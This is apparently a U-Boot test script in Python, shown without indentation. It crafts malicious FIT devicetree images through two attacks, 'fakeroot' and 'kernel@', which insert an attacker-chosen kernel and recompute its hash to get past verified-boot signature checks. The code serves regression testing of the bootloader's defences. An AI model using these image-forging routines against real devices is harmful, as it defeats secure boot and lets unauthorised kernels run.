blob: 9825c21716b8fff75b5335a4873094e0692a96ef [file] [log] [blame]
# SPDX-License-Identifier: GPL-2.0
# Copyright (c) 2020, Intel Corporation
"""Modifies a devicetree to add a fake root node, for testing purposes"""
import hashlib
import struct
import sys
FDT_PROP = 0x3
FDT_BEGIN_NODE = 0x1
FDT_END_NODE = 0x2
FDT_END = 0x9
FAKE_ROOT_ATTACK = 0
KERNEL_AT = 1
MAGIC = 0xd00dfeed
EVIL_KERNEL_NAME = b'evil_kernel'
FAKE_ROOT_NAME = b'f@keroot'
def getstr(dt_strings, off):
"""Get a string from the devicetree string table
Args:
dt_strings (bytes): Devicetree strings section
off (int): Offset of string to read
Returns:
str: String read from the table
"""
output = ''
while dt_strings[off]:
output += chr(dt_strings[off])
off += 1
return output
def align(offset):
"""Align an offset to a multiple of 4
Args:
offset (int): Offset to align
Returns:
int: Resulting aligned offset (rounds up to nearest multiple)
"""
return (offset + 3) & ~3
def determine_offset(dt_struct, dt_strings, searched_node_name):
"""Determines the offset of an element, either a node or a property
Args:
dt_struct (bytes): Devicetree struct section
dt_strings (bytes): Devicetree strings section
searched_node_name (str): element path, ex: /images/kernel@1/data
Returns:
tuple: (node start offset, node end offset)
if element is not found, returns (None, None)
"""
offset = 0
depth = -1
path = '/'
object_start_offset = None
object_end_offset = None
object_depth = None
while offset < len(dt_struct):
(tag,) = struct.unpack('>I', dt_struct[offset:offset + 4])
if tag == FDT_BEGIN_NODE:
depth += 1
begin_node_offset = offset
offset += 4
node_name = getstr(dt_struct, offset)
offset += len(node_name) + 1
offset = align(offset)
if path[-1] != '/':
path += '/'
path += str(node_name)
if path == searched_node_name:
object_start_offset = begin_node_offset
object_depth = depth
elif tag == FDT_PROP:
begin_prop_offset = offset
offset += 4
len_tag, nameoff = struct.unpack('>II',
dt_struct[offset:offset + 8])
offset += 8
prop_name = getstr(dt_strings, nameoff)
len_tag = align(len_tag)
offset += len_tag
node_path = path + '/' + str(prop_name)
if node_path == searched_node_name:
object_start_offset = begin_prop_offset
elif tag == FDT_END_NODE:
offset += 4
path = path[:path.rfind('/')]
if not path:
path = '/'
if depth == object_depth:
object_end_offset = offset
break
depth -= 1
elif tag == FDT_END:
break
else:
print('unknown tag=0x%x, offset=0x%x found!' % (tag, offset))
break
return object_start_offset, object_end_offset
def modify_node_name(dt_struct, node_offset, replcd_name):
"""Change the name of a node
Args:
dt_struct (bytes): Devicetree struct section
node_offset (int): Offset of node
replcd_name (str): New name for node
Returns:
bytes: New dt_struct contents
"""
# skip 4 bytes for the FDT_BEGIN_NODE
node_offset += 4
node_name = getstr(dt_struct, node_offset)
node_name_len = len(node_name) + 1
node_name_len = align(node_name_len)
replcd_name += b'\0'
# align on 4 bytes
while len(replcd_name) % 4:
replcd_name += b'\0'
dt_struct = (dt_struct[:node_offset] + replcd_name +
dt_struct[node_offset + node_name_len:])
return dt_struct
def modify_prop_content(dt_struct, prop_offset, content):
"""Overwrite the value of a property
Args:
dt_struct (bytes): Devicetree struct section
prop_offset (int): Offset of property (FDT_PROP tag)
content (bytes): New content for the property
Returns:
bytes: New dt_struct contents
"""
# skip FDT_PROP
prop_offset += 4
(len_tag, nameoff) = struct.unpack('>II',
dt_struct[prop_offset:prop_offset + 8])
# compute padded original node length
original_node_len = len_tag + 8 # content length + prop meta data len
original_node_len = align(original_node_len)
added_data = struct.pack('>II', len(content), nameoff)
added_data += content
while len(added_data) % 4:
added_data += b'\0'
dt_struct = (dt_struct[:prop_offset] + added_data +
dt_struct[prop_offset + original_node_len:])
return dt_struct
def change_property_value(dt_struct, dt_strings, prop_path, prop_value,
required=True):
"""Change a given property value
Args:
dt_struct (bytes): Devicetree struct section
dt_strings (bytes): Devicetree strings section
prop_path (str): full path of the target property
prop_value (bytes): new property name
required (bool): raise an exception if property not found
Returns:
bytes: New dt_struct contents
Raises:
ValueError: if the property is not found
"""
(rt_node_start, _) = determine_offset(dt_struct, dt_strings, prop_path)
if rt_node_start is None:
if not required:
return dt_struct
raise ValueError('Fatal error, unable to find prop %s' % prop_path)
dt_struct = modify_prop_content(dt_struct, rt_node_start, prop_value)
return dt_struct
def change_node_name(dt_struct, dt_strings, node_path, node_name):
"""Change a given node name
Args:
dt_struct (bytes): Devicetree struct section
dt_strings (bytes): Devicetree strings section
node_path (str): full path of the target node
node_name (str): new node name, just node name not full path
Returns:
bytes: New dt_struct contents
Raises:
ValueError: if the node is not found
"""
(rt_node_start, rt_node_end) = (
determine_offset(dt_struct, dt_strings, node_path))
if rt_node_start is None or rt_node_end is None:
raise ValueError('Fatal error, unable to find root node')
dt_struct = modify_node_name(dt_struct, rt_node_start, node_name)
return dt_struct
def get_prop_value(dt_struct, dt_strings, prop_path):
"""Get the content of a property based on its path
Args:
dt_struct (bytes): Devicetree struct section
dt_strings (bytes): Devicetree strings section
prop_path (str): full path of the target property
Returns:
bytes: Property value
Raises:
ValueError: if the property is not found
"""
(offset, _) = determine_offset(dt_struct, dt_strings, prop_path)
if offset is None:
raise ValueError('Fatal error, unable to find prop')
offset += 4
(len_tag,) = struct.unpack('>I', dt_struct[offset:offset + 4])
offset += 8
tag_data = dt_struct[offset:offset + len_tag]
return tag_data
def kernel_at_attack(dt_struct, dt_strings, kernel_content, kernel_hash):
"""Conduct the kernel@ attack
It fetches from /configurations/default the name of the kernel being loaded.
Then, if the kernel name does not contain any @sign, duplicates the kernel
in /images node and appends '@evil' to its name.
It inserts a new kernel content and updates its images digest.
Inputs:
- FIT dt_struct
- FIT dt_strings
- kernel content blob
- kernel hash blob
Important note: it assumes the U-Boot loading method is 'kernel' and the
loaded kernel hash's subnode name is 'hash-1'
"""
# retrieve the default configuration name
default_conf_name = get_prop_value(
dt_struct, dt_strings, '/configurations/default')
default_conf_name = str(default_conf_name[:-1], 'utf-8')
conf_path = '/configurations/' + default_conf_name
# fetch the loaded kernel name from the default configuration
loaded_kernel = get_prop_value(dt_struct, dt_strings, conf_path + '/kernel')
loaded_kernel = str(loaded_kernel[:-1], 'utf-8')
if loaded_kernel.find('@') != -1:
print('kernel@ attack does not work on nodes already containing an @ sign!')
sys.exit()
# determine boundaries of the loaded kernel
(krn_node_start, krn_node_end) = (determine_offset(
dt_struct, dt_strings, '/images/' + loaded_kernel))
if krn_node_start is None and krn_node_end is None:
print('Fatal error, unable to find root node')
sys.exit()
# copy the loaded kernel
loaded_kernel_copy = dt_struct[krn_node_start:krn_node_end]
# insert the copy inside the tree
dt_struct = dt_struct[:krn_node_start] + \
loaded_kernel_copy + dt_struct[krn_node_start:]
evil_kernel_name = loaded_kernel+'@evil'
# change the inserted kernel name
dt_struct = change_node_name(
dt_struct, dt_strings, '/images/' + loaded_kernel, bytes(evil_kernel_name, 'utf-8'))
# change the content of the kernel being loaded
dt_struct = change_property_value(
dt_struct, dt_strings, '/images/' + evil_kernel_name + '/data', kernel_content)
# change the content of the kernel being loaded
dt_struct = change_property_value(
dt_struct, dt_strings, '/images/' + evil_kernel_name + '/hash-1/value', kernel_hash)
return dt_struct
def fake_root_node_attack(dt_struct, dt_strings, kernel_content, kernel_digest):
"""Conduct the fakenode attack
It duplicates the original root node at the beginning of the tree.
Then it modifies within this duplicated tree:
- The loaded kernel name
- The loaded kernel data
Important note: it assumes the UBoot loading method is 'kernel' and the loaded kernel
hash's subnode name is hash@1
"""
# retrieve the default configuration name
default_conf_name = get_prop_value(
dt_struct, dt_strings, '/configurations/default')
default_conf_name = str(default_conf_name[:-1], 'utf-8')
conf_path = '/configurations/'+default_conf_name
# fetch the loaded kernel name from the default configuration
loaded_kernel = get_prop_value(dt_struct, dt_strings, conf_path + '/kernel')
loaded_kernel = str(loaded_kernel[:-1], 'utf-8')
# determine root node start and end:
(rt_node_start, rt_node_end) = (determine_offset(dt_struct, dt_strings, '/'))
if (rt_node_start is None) or (rt_node_end is None):
print('Fatal error, unable to find root node')
sys.exit()
# duplicate the whole tree
duplicated_node = dt_struct[rt_node_start:rt_node_end]
# dchange root name (empty name) to fake root name
new_dup = change_node_name(duplicated_node, dt_strings, '/', FAKE_ROOT_NAME)
dt_struct = new_dup + dt_struct
# change the value of /<fake_root_name>/configs/<default_config_name>/kernel
# so our modified kernel will be loaded
base = '/' + str(FAKE_ROOT_NAME, 'utf-8')
value_path = base + conf_path+'/kernel'
dt_struct = change_property_value(dt_struct, dt_strings, value_path,
EVIL_KERNEL_NAME + b'\0')
# change the node of the /<fake_root_name>/images/<original_kernel_name>
images_path = base + '/images/'
node_path = images_path + loaded_kernel
dt_struct = change_node_name(dt_struct, dt_strings, node_path,
EVIL_KERNEL_NAME)
# change the content of the kernel being loaded
data_path = images_path + str(EVIL_KERNEL_NAME, 'utf-8') + '/data'
dt_struct = change_property_value(dt_struct, dt_strings, data_path,
kernel_content, required=False)
# update the digest value
hash_path = images_path + str(EVIL_KERNEL_NAME, 'utf-8') + '/hash-1/value'
dt_struct = change_property_value(dt_struct, dt_strings, hash_path,
kernel_digest)
return dt_struct
def add_evil_node(in_fname, out_fname, kernel_fname, attack):
"""Add an evil node to the devicetree
Args:
in_fname (str): Filename of input devicetree
out_fname (str): Filename to write modified devicetree to
kernel_fname (str): Filename of kernel data to add to evil node
attack (str): Attack type ('fakeroot' or 'kernel@')
Raises:
ValueError: Unknown attack name
"""
if attack == 'fakeroot':
attack = FAKE_ROOT_ATTACK
elif attack == 'kernel@':
attack = KERNEL_AT
else:
raise ValueError('Unknown attack name!')
with open(in_fname, 'rb') as fin:
input_data = fin.read()
hdr = input_data[0:0x28]
offset = 0
magic = struct.unpack('>I', hdr[offset:offset + 4])[0]
if magic != MAGIC:
raise ValueError('Wrong magic!')
offset += 4
(totalsize, off_dt_struct, off_dt_strings, off_mem_rsvmap, version,
last_comp_version, boot_cpuid_phys, size_dt_strings,
size_dt_struct) = struct.unpack('>IIIIIIIII', hdr[offset:offset + 36])
rsv_map = input_data[off_mem_rsvmap:off_dt_struct]
dt_struct = input_data[off_dt_struct:off_dt_struct + size_dt_struct]
dt_strings = input_data[off_dt_strings:off_dt_strings + size_dt_strings]
with open(kernel_fname, 'rb') as kernel_file:
kernel_content = kernel_file.read()
# computing inserted kernel hash
val = hashlib.sha1()
val.update(kernel_content)
hash_digest = val.digest()
if attack == FAKE_ROOT_ATTACK:
dt_struct = fake_root_node_attack(dt_struct, dt_strings, kernel_content,
hash_digest)
elif attack == KERNEL_AT:
dt_struct = kernel_at_attack(dt_struct, dt_strings, kernel_content,
hash_digest)
# now rebuild the new file
size_dt_strings = len(dt_strings)
size_dt_struct = len(dt_struct)
totalsize = 0x28 + len(rsv_map) + size_dt_struct + size_dt_strings
off_mem_rsvmap = 0x28
off_dt_struct = off_mem_rsvmap + len(rsv_map)
off_dt_strings = off_dt_struct + len(dt_struct)
header = struct.pack('>IIIIIIIIII', MAGIC, totalsize, off_dt_struct,
off_dt_strings, off_mem_rsvmap, version,
last_comp_version, boot_cpuid_phys, size_dt_strings,
size_dt_struct)
with open(out_fname, 'wb') as output_file:
output_file.write(header)
output_file.write(rsv_map)
output_file.write(dt_struct)
output_file.write(dt_strings)
if __name__ == '__main__':
if len(sys.argv) != 5:
print('usage: %s <input_filename> <output_filename> <kernel_binary> <attack_name>' %
sys.argv[0])
print('valid attack names: [fakeroot, kernel@]')
sys.exit(1)
add_evil_node(sys.argv[1:])